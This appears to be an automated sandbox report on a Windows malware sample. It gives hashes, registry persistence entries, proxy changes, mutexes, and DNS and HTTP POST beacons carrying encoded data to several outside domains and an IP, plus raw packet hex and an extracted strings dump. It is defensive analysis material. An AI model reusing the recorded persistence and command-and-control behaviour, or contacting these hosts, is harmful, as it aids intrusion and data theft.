Analysis Date2014-08-22 01:28:37
MD50ad0b7ec4b267aa8e81cde36535ddaa7
SHA19ff37a961d15b7712a560efaf0837e185c5d352c

Static Details:

File typePE32 executable for MS Windows (GUI) Intel 80386 32-bit
Section.idata md5: ba4b0ad064f2bd9372a399a6563f7047 sha1: 15a5604f83163156098d9700bb83b15d609ea0d1 size: 29184
SectionINIT md5: 43273a7b0324056af572222a3b0c2887 sha1: 0979f7334165bb13f90b8d7e0b1414e5132543fc size: 114176
Section.init md5: da1086b8180b3894a9a8e56e391bbea5 sha1: 5e205e938304a89f354c7b1d6345379fc4f02857 size: 5632
Section.rdata md5: c55d339a1d97d4c110a45a839e6b4e07 sha1: ba0f9871df0aaffc53dbbdb6efee7e0cb8c7ceef size: 1024
Timestamp2009-06-02 07:42:26
PEhash4fb93ec042adc200e8642281da61ac6c6f984125
IMPhashe7e429caf894e8c0ffcfa0914481680f

Runtime Details:

Screenshot

Process
↳ C:\malware.exe

Creates ProcessC:\malware.exe
Creates MutexGlobal\{F1376AF8-22FB-4ab3-9EB9-0AFF0F492752}
Creates Mutex{32261348-E850-46f2-80A7-E9D26FE256BE}

Process
↳ C:\malware.exe

RegistryHKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run\TOY5KNQ8OC ➝
C:\malware.exe
RegistryHKEY_CURRENT_CONFIG\Software\Microsoft\windows\CurrentVersion\Internet Settings\ProxyEnable ➝
NULL
RegistryHKEY_CURRENT_USER\Software\TOY5KNQ8OC\Ol2 ➝
xC7aKZ+O6wyPlq1krRM4sG7m2LFGsYtHjHOagBf10Uk/n4gL8s8xs9LeD5KQVh3/j+XFa0mnr175UElKKyciA2gn6tUEA721Fj4P\\x00
RegistryHKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProxyBypass ➝
1
Creates FileC:\Documents and Settings\Administrator\Local Settings\History\History.IE5\index.dat
Creates FileC:\Documents and Settings\Administrator\Cookies\index.dat
Creates FilePIPE\lsarpc
Creates File\Device\Afd\Endpoint
Creates FileC:\Documents and Settings\Administrator\Local Settings\Temporary Internet Files\Content.IE5\index.dat
Creates FileC:\WINDOWS\Tasks\{66BA574B-1E11-49b8-909C-8CC9E0E8E015}.job
Creates Mutexc:!documents and settings!administrator!local settings!history!history.ie5!
Creates MutexGlobal\{F1376AF8-22FB-4ab3-9EB9-0AFF0F492752}
Creates MutexWininetConnectionMutex
Creates Mutexc:!documents and settings!administrator!cookies!
Creates Mutexc:!documents and settings!administrator!local settings!temporary internet files!content.ie5!
Creates Mutex{32261348-E850-46f2-80A7-E9D26FE256BE}
Winsock DNSbefreenet.com
Winsock DNSsgfax.com
Winsock DNS182.30.149.69
Winsock DNSmaximclock.com
Winsock DNSurlse.com

Network Details:

DNSsgfax.com
Type: A
184.168.221.60
DNSurlse.com
Type: A
54.208.247.222
DNSsetregistration.com
Type: A
208.73.211.163
DNSsetregistration.com
Type: A
208.73.211.174
DNSsetregistration.com
Type: A
208.73.211.175
DNSsetregistration.com
Type: A
208.73.211.193
DNSsetregistration.com
Type: A
208.73.211.242
DNSmaximclock.com
Type: A
DNSaccountunions.com
Type: A
DNSbefreenet.com
Type: A
HTTP POSThttp://sgfax.com/resolution.php
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0)
HTTP POSThttp://urlse.com/borders.php
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0)
HTTP POSThttp://182.30.149.69/borders.php
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0)
Flows TCP192.168.1.1:1031 ➝ 184.168.221.60:80
Flows TCP192.168.1.1:1032 ➝ 54.208.247.222:80
Flows TCP192.168.1.1:1033 ➝ 182.30.149.69:80

Raw Pcap
0x00000000 (00000)   504f5354 202f7265 736f6c75 74696f6e   POST /resolution
0x00000010 (00016)   2e706870 20485454 502f312e 310d0a41   .php HTTP/1.1..A
0x00000020 (00032)   63636570 743a202a 2f2a0d0a 436f6e74   ccept: */*..Cont
0x00000030 (00048)   656e742d 54797065 3a206170 706c6963   ent-Type: applic
0x00000040 (00064)   6174696f 6e2f782d 7777772d 666f726d   ation/x-www-form
0x00000050 (00080)   2d75726c 656e636f 6465640d 0a557365   -urlencoded..Use
0x00000060 (00096)   722d4167 656e743a 204d6f7a 696c6c61   r-Agent: Mozilla
0x00000070 (00112)   2f342e30 2028636f 6d706174 69626c65   /4.0 (compatible
0x00000080 (00128)   3b204d53 49452036 2e303b20 57696e64   ; MSIE 6.0; Wind
0x00000090 (00144)   6f777320 4e542035 2e30290d 0a486f73   ows NT 5.0)..Hos
0x000000a0 (00160)   743a2073 67666178 2e636f6d 0d0a436f   t: sgfax.com..Co
0x000000b0 (00176)   6e74656e 742d4c65 6e677468 3a203334   ntent-Length: 34
0x000000c0 (00192)   310d0a43 6f6e6e65 6374696f 6e3a204b   1..Connection: K
0x000000d0 (00208)   6565702d 416c6976 650d0a43 61636865   eep-Alive..Cache
0x000000e0 (00224)   2d436f6e 74726f6c 3a206e6f 2d636163   -Control: no-cac
0x000000f0 (00240)   68650d0a 0d0a6461 74613d2f 436a4566   he....data=/CjEf
0x00000100 (00256)   5a445376 78714369 4b306c74 554d3175   ZDSvxqCiK0ltUM1u
0x00000110 (00272)   79322f79 75345535 59704e6d 31762f2f   y2/yu4U5YpNm1v//
0x00000120 (00288)   6a546e67 56632b77 4d732b2b 5a426a37   jTngVc+wMs++ZBj7
0x00000130 (00304)   5a535954 72336942 6b472f67 2b375643   ZSYTr3iBkG/g+7VC
0x00000140 (00320)   432f3070 4565324f 48703765 52634850   C/0pEe2OHp7eRcHP
0x00000150 (00336)   69596f39 74774d55 756a6755 57346276   iYo9twMUujgUW4bv
0x00000160 (00352)   5449644e 2f6a5058 7547506a 61427a78   TIdN/jPXuGPjaBzx
0x00000170 (00368)   6c636335 6d704e30 31613674 2f516953   lcc5mpN01a6t/QiS
0x00000180 (00384)   58587770 7a39486d 306b7a39 66426661   XXwpz9Hm0kz9fBfa
0x00000190 (00400)   556e3130 782f474c 636f6652 6948344c   Un10x/GLcofRiH4L
0x000001a0 (00416)   76467341 69475946 7361696f 4d573037   vFsAiGYFsaioMW07
0x000001b0 (00432)   4b304533 726b6b33 4d655a55 79674465   K0E3rkk3MeZUygDe
0x000001c0 (00448)   4c477732 7331322b 6f504d4e 726e4a5a   LGw2s12+oPMNrnJZ
0x000001d0 (00464)   637a687a 5a387869 4e577535 54674f68   czhzZ8xiNWu5TgOh
0x000001e0 (00480)   71344f71 55533042 4d54644b 32625a79   q4OqUS0BMTdK2bZy
0x000001f0 (00496)   2f687833 546e6d47 7954464c 48684c63   /hx3TnmGyTFLHhLc
0x00000200 (00512)   52662b76 417a494f 424e6d76 34334344   Rf+vAzIOBNmv43CD
0x00000210 (00528)   4b325130 35415663 6d413832 4b685466   K2Q05AVcmA82KhTf
0x00000220 (00544)   5573732f 476f6c77 686c6d39 6b4c6775   Uss/Golwhlm9kLgu
0x00000230 (00560)   326c4936 7055366e 3336642f 6e346b6f   2lI6pU6n36d/n4ko
0x00000240 (00576)   6c567861 36516e2f 413d3d              lVxa6Qn/A==

0x00000000 (00000)   504f5354 202f626f 72646572 732e7068   POST /borders.ph
0x00000010 (00016)   70204854 54502f31 2e310d0a 41636365   p HTTP/1.1..Acce
0x00000020 (00032)   70743a20 2a2f2a0d 0a436f6e 74656e74   pt: */*..Content
0x00000030 (00048)   2d547970 653a2061 70706c69 63617469   -Type: applicati
0x00000040 (00064)   6f6e2f78 2d777777 2d666f72 6d2d7572   on/x-www-form-ur
0x00000050 (00080)   6c656e63 6f646564 0d0a5573 65722d41   lencoded..User-A
0x00000060 (00096)   67656e74 3a204d6f 7a696c6c 612f342e   gent: Mozilla/4.
0x00000070 (00112)   30202863 6f6d7061 7469626c 653b204d   0 (compatible; M
0x00000080 (00128)   53494520 362e303b 2057696e 646f7773   SIE 6.0; Windows
0x00000090 (00144)   204e5420 352e3029 0d0a486f 73743a20    NT 5.0)..Host: 
0x000000a0 (00160)   75726c73 652e636f 6d0d0a43 6f6e7465   urlse.com..Conte
0x000000b0 (00176)   6e742d4c 656e6774 683a2033 34310d0a   nt-Length: 341..
0x000000c0 (00192)   436f6e6e 65637469 6f6e3a20 4b656570   Connection: Keep
0x000000d0 (00208)   2d416c69 76650d0a 43616368 652d436f   -Alive..Cache-Co
0x000000e0 (00224)   6e74726f 6c3a206e 6f2d6361 6368650d   ntrol: no-cache.
0x000000f0 (00240)   0a0d0a64 6174613d 2f436a45 665a4453   ...data=/CjEfZDS
0x00000100 (00256)   76787143 694b306c 74554d31 7579322f   vxqCiK0ltUM1uy2/
0x00000110 (00272)   79753455 3559704e 6d31762f 2f6a546e   yu4U5YpNm1v//jTn
0x00000120 (00288)   6756632b 774d732b 2b5a426a 375a5359   gVc+wMs++ZBj7ZSY
0x00000130 (00304)   54723369 426b472f 672b3756 43432f30   Tr3iBkG/g+7VCC/0
0x00000140 (00320)   70456532 4f487037 65526348 5069596f   pEe2OHp7eRcHPiYo
0x00000150 (00336)   3974774d 55756a67 55573462 76544964   9twMUujgUW4bvTId
0x00000160 (00352)   4e2f6a50 58754750 6a61427a 786c6363   N/jPXuGPjaBzxlcc
0x00000170 (00368)   356d704e 30316136 742f5169 53585877   5mpN01a6t/QiSXXw
0x00000180 (00384)   707a3948 6d306b7a 39664266 61556e31   pz9Hm0kz9fBfaUn1
0x00000190 (00400)   30782f47 4c636f66 52694834 4c764673   0x/GLcofRiH4LvFs
0x000001a0 (00416)   41694759 46736169 6f4d5730 374b3045   AiGYFsaioMW07K0E
0x000001b0 (00432)   33726b6b 334d655a 55796744 654c4777   3rkk3MeZUygDeLGw
0x000001c0 (00448)   32733132 2b6f504d 4e726e4a 5a637a68   2s12+oPMNrnJZczh
0x000001d0 (00464)   7a5a3878 694e5775 3554674f 6871344f   zZ8xiNWu5TgOhq4O
0x000001e0 (00480)   71555330 424d5464 4b32625a 792f6878   qUS0BMTdK2bZy/hx
0x000001f0 (00496)   33546e6d 47795446 4c48684c 6352662b   3TnmGyTFLHhLcRf+
0x00000200 (00512)   76417a49 4f424e6d 76343343 444b3251   vAzIOBNmv43CDK2Q
0x00000210 (00528)   30354156 636d4138 324b6854 66557373   05AVcmA82KhTfUss
0x00000220 (00544)   2f476f6c 77786c6d 396b4c67 75326c49   /Golwxlm9kLgu2lI
0x00000230 (00560)   36705536 6e333664 2f6e346b 6f6c5678   6pU6n36d/n4kolVx
0x00000240 (00576)   6136516e 2f413d3d 413d3d              a6Qn/A==A==

0x00000000 (00000)   504f5354 202f626f 72646572 732e7068   POST /borders.ph
0x00000010 (00016)   70204854 54502f31 2e310d0a 41636365   p HTTP/1.1..Acce
0x00000020 (00032)   70743a20 2a2f2a0d 0a436f6e 74656e74   pt: */*..Content
0x00000030 (00048)   2d547970 653a2061 70706c69 63617469   -Type: applicati
0x00000040 (00064)   6f6e2f78 2d777777 2d666f72 6d2d7572   on/x-www-form-ur
0x00000050 (00080)   6c656e63 6f646564 0d0a5573 65722d41   lencoded..User-A
0x00000060 (00096)   67656e74 3a204d6f 7a696c6c 612f342e   gent: Mozilla/4.
0x00000070 (00112)   30202863 6f6d7061 7469626c 653b204d   0 (compatible; M
0x00000080 (00128)   53494520 362e303b 2057696e 646f7773   SIE 6.0; Windows
0x00000090 (00144)   204e5420 352e3029 0d0a486f 73743a20    NT 5.0)..Host: 
0x000000a0 (00160)   3138322e 33302e31 34392e36 390d0a43   182.30.149.69..C
0x000000b0 (00176)   6f6e7465 6e742d4c 656e6774 683a2033   ontent-Length: 3
0x000000c0 (00192)   34310d0a 436f6e6e 65637469 6f6e3a20   41..Connection: 
0x000000d0 (00208)   4b656570 2d416c69 76650d0a 43616368   Keep-Alive..Cach
0x000000e0 (00224)   652d436f 6e74726f 6c3a206e 6f2d6361   e-Control: no-ca
0x000000f0 (00240)   6368650d 0a0d0a64 6174613d 2f436a45   che....data=/CjE
0x00000100 (00256)   665a4453 76787143 694b306c 74554d31   fZDSvxqCiK0ltUM1
0x00000110 (00272)   7579322f 79753455 3559704e 6d31762f   uy2/yu4U5YpNm1v/
0x00000120 (00288)   2f6a546e 6756632b 774d732b 2b5a426a   /jTngVc+wMs++ZBj
0x00000130 (00304)   375a5359 54723369 426b472f 672b3756   7ZSYTr3iBkG/g+7V
0x00000140 (00320)   43432f30 70456532 4f487037 65526348   CC/0pEe2OHp7eRcH
0x00000150 (00336)   5069596f 3974774d 55756a67 55573462   PiYo9twMUujgUW4b
0x00000160 (00352)   76544964 4e2f6a50 58754750 6a61427a   vTIdN/jPXuGPjaBz
0x00000170 (00368)   786c6363 356d704e 30316136 742f5169   xlcc5mpN01a6t/Qi
0x00000180 (00384)   53585877 707a3948 6d306b7a 39664266   SXXwpz9Hm0kz9fBf
0x00000190 (00400)   61556e31 30782f47 4c636f66 52694834   aUn10x/GLcofRiH4
0x000001a0 (00416)   4c764673 41694759 46736169 6f4d5730   LvFsAiGYFsaioMW0
0x000001b0 (00432)   374b3045 33726b6b 334d655a 55796744   7K0E3rkk3MeZUygD
0x000001c0 (00448)   654c4777 32733132 2b6f504d 4e726e4a   eLGw2s12+oPMNrnJ
0x000001d0 (00464)   5a637a68 7a5a3878 694e5775 3554674f   ZczhzZ8xiNWu5TgO
0x000001e0 (00480)   6871344f 71555330 424d5464 4b32625a   hq4OqUS0BMTdK2bZ
0x000001f0 (00496)   792f6878 33546e6d 47795446 4c48684c   y/hx3TnmGyTFLHhL
0x00000200 (00512)   6352662b 76417a49 4f424e6d 76343343   cRf+vAzIOBNmv43C
0x00000210 (00528)   444b3251 30354156 636d4138 324b6854   DK2Q05AVcmA82KhT
0x00000220 (00544)   66557373 2f476f6c 77786c6d 396b4c67   fUss/Golwxlm9kLg
0x00000230 (00560)   75326c49 36705536 6e333664 2f6e346b   u2lI6pU6n36d/n4k
0x00000240 (00576)   6f6c5678 6136516e 2f413d3d            olVxa6Qn/A==


Strings
Z
.
n..M
.
...
4
W .
.

jshu
tW7n
*|&,:!
01.8T^
0<(57z
05PQbF?
05=Q<Y
0\c0l~
0gFjX~
0=m&4e|
0Q1=T 
,/0~_S
#119N_
18d6|.
1.~9-)0
1(f,go
^, 1=;g?
1|GJ[{Qi#
.*1gm1
(1T?K3
1*=:x=<$
1ZaFuW
_*1zu<:
 2;0"^
2:0Lw;
2#:+3c$
}2);9_
2dLcGD
2.i-rI
?.+2lV
#2Oxvy
^ 2t5Yo
=2$'tn
(2+&z:
\#~3~^
32;;lc
3b6J<&gO~
;3?*dN
-3Gm9MN
3gVwIReX5
3T:o<c
;45JZ7i+
=(\4=6;
^/4o?K2 7
4#tJZ?<dl
,',4u>9G
&5?(,0
59^tsJIo
5@)*=fL
.5?nm$R
5\ xyP"
^+5&,y
6bEPLwz5ezhr5
6f$.UPvy
6mizcIm
6nG0N5
/7*(:?
7m#I$1
7?MR:"
7n9hoFpuj
7(OV^N
89GsLrkP
\{8Fj9'
8)L6s%1
8(t7BA	>
8#,z09
8:ZpT~m
9	76Dgn
97r^Mf;H
-.98yv
9 h:)<~
#\9%(/K
9MJh21
9'*PN3
9uo4nZ
9v0]t@
("9^vj
9.Vo27D"=
9xFt5V
a4OI~r
*A6- ?F0
_acmdln
_ADAu 
ADVAPI32.dll
aDV?v=
a`~ME~
%&a^O_ 
ASkI95
av#F9xg
aXil~O
|{"azW~
:?]%b1
b1MZVR
b=<9hn
Bbu5EU
BeginPaint
bF5Z1zL
bgj7LH
buJ6WW
`^+]=C	
~|}C0q
C>19&l
c2P0C;v
	C#^6<
calloc
CallWindowProcA
C!B.?|:CZ
C<FlK%?
CharLowerA
CharNextA
!+cL&[
~CN=01
CoGetContextToken
comdlg32.dll
CoUnmarshalInterface
CreateIcon
CreateMenu
	D|0gzE
D. %1NL=
d:.#43
<d8gI"
D9=J8?
-DC<.v
DeferWindowPos
DeleteCriticalSection
dh=Jc]
DispatchMessageA
d,LX#0
DN%V^fp?B
DragQueryFileA
DrawEdge
DrawMenuBar
dzv8ce
e3f;c8
e.}8ixF
e/9<:I
eB)	9b
EB{.CQ4
eCw=+1{52
EnableMenuItem
EndDeferWindowPos
EnumCalendarInfoA
EnumChildWindows
EnumThreadWindows
EnumWindows
ePBFBp
ExitProcess
E[X]ST
EYq-=%1
E=ZJxn
-F	41N
F"GVEO@D)2
FindFirstFileA
FindWindowA
FJa`^~
fn^&,?
FreeResource
F~(Vr6
F%x4>H
}F.x-S
g=<7~c
)'g9F%!|E
gA#[qjf]
GDI32.dll
GetClassInfoA
GetClientRect
GetCommandLineA
GetCurrentThread
GetCurrentThreadId
GetCursor
GetDesktopWindow
GetDIBColorTable
GetDiskFreeSpaceA
GetFileTitleA
GetFileVersionInfoA
GetFileVersionInfoSizeA
GetFocus
GetFullPathNameA
GetIconInfo
GetKeyState
GetMenuItemCount
GetMenuStringA
GetProcAddress
GetPropA
GetSaveFileNameA
GetScrollRange
GetSysColor
GetVersionExA
gH4=+r V
;\gj"-
[Gl='bWs"
gLo:\*
GlobalDeleteAtom
gMO*2L
#G&T;"!g
g.Trh1
gtuA~A
<H~0ihz
h4DC6=YN
hDU0pR
HeapFree
HF#1x9
HF.8L[
~.,Hg|
$hkr@	
H:Kt#U
hsl@6z
?HU1_Ykx
hW8JK_R
H;z;-`
\hz_+;0-
I!29U(
i476W`
I54L36
i9n"Pp
iacXr9h
.idata
I]Md(J
@.init
InitializeCriticalSection
~I;r^N
;!^IVN?~94F5
<|j4Nn~
jC20]+nP
J(f?p9
jGfkKc
J"ievB0t/
JMl7iNNf
jn#-`,
-jO7L;
j$)t"0
=&K(%$
$&-=K,
k3Z5N*g
+=K8i:
K,8rLgm
KA?C.S
kernel32.dll
kgm~i+
kmj3GVm
K@_W8zqm
|KXJOP
kx-"`Z
l;5L)*Y=
l69c=1}>N
/l,B:^9aZ
L=h~}m
>l':iv 
;Lj;?8b
lK_P.wMi
LoadLibraryExA
LoadResource
lRx6PtjF
lstrcmpiA
lstrlenA
?Lvr~*
lV&?)Y/
lW]VzfT
^LzbkW
M[0B2u
M7;&2`.\
M8OoNF
m9WWH1
mAbGjA
malloc
mbstowcs
memcpy
memmove
MessageBoxA
MkParseDisplayName
mNZ7 (
MoveFileExA
mQW/.Q
m[s1>Jkn
MSVCRT.dll
m\,T#?a
(!MUj@?\
MUzcsRW
=m*z<;
!mZk2}
&n{6r?
N<8?y[J}
Na0_WJM9
NCY!|My
njT:>mi
NJWQP~
NomQgXl3
/NQWF/
N@%?yYz
:O5e<B
o;69p"
O:,C1sfb,
O<fh:3z
oJjfa^
O~Kw9SQ
OLE32.dll
'[Ov0N
?~(o|{wn
":<O^y
Pakb@W
PathFileExistsA
PathIsContentTypeA
PathIsDirectoryA
PbYzZI:
|{Pdf0
p);h9`
PHF2;hK?
"-!P=%J6
P~#MJZ
P*mvr:i
p^)~Ov7
@pQWLh
PWfzM]
PWLhQWM
PW:`QW$
PW!>QW
}Px=>j
PxkJ9W
P'XTE5
]Q	_A 
qfk9$T.
qi="7~R{
QLrHQ>
QpK3u6
,QRS9f
+ q_?v
)QW@lnW
qyFhbC9
r5fJoxR
<\R90mh
RaiseException
Ra>|Wf
.rdata
RegCreateKeyA
RegEnumKeyA
RegEnumValueA
RegOpenKeyExA
~r`j(,
>R*lhk
ro] #n~
+~ roZ
rR[=j+.m
rtQky40
r.u"{lp
r}wz>xWL=Y
;?.rxn
r*Y/F=
	S?:$<?
S8)Qt@;
s96LGQ@
SetBkColor
SetCursor
SetEvent
SetHandleCount
SetTimer
SetWindowPos
-sHCb=
SHDeleteKeyA
SHDeleteValueA
shell32.dll
SHEnumValueA
SHGetDesktopFolder
SHGetFileInfoA
SHGetFolderPathA
SHGetValueA
shlwapi.dll
SHLWAPI.dll
SHLWAPI.DLL
SHQueryInfoKeyA
SHQueryValueExA
SHStrDupA
SizeofResource
SP0LR!.
_S#]"PC
s/Q!|v
s+~V9#F
SystemParametersInfoA
<SZRP6
t5tR7vV
<T9KY)
}@Ta	R
 tDKy>z
Tg?+.Qv/
*Tgu^9
!This program cannot be run in DOS mode.
#<Tn>?
tolower
&t?P1|
<U'-1`
?u2m"gv
u9JBHn~
uE!=W0KdM
=Uhot~
|Umi>&f
umUL=&,
uqCBks05
{U+.rX
user32.dll
USER32.dll
#=+V2i*4
.&,v8K 
)V?990'
v_9fm7-T
?V^B.w
vc!0CT
VerFindFileA
VerInstallFileA
VerQueryValueA
version.dll
VERSION.dll
VirtualAlloc
VirtualAllocEx
VirtualQuery
[vlRnr
vo"}>.
}V_*R 
VR!?x6
V=wZNv
^*:/=w
W/2QW9
W9EQW,
WB2.9e
?wbEVU[Z
wcsncmp
W=FBNC0(
WideCharToMultiByte
W,=lo"
WriteFile
,W#u<&(
_wZim.b
X0dfrc^
X0M^){o
}%X1K~
=X<:7O
XUQ=99*
y6n0mh
Y8=7.0&
y|.m&N1
{./Yrz0K6
YS.*9\]9V:
~>Yv1A
,z></c
?}z%\Ck6
^znbRBj
|^ ,zy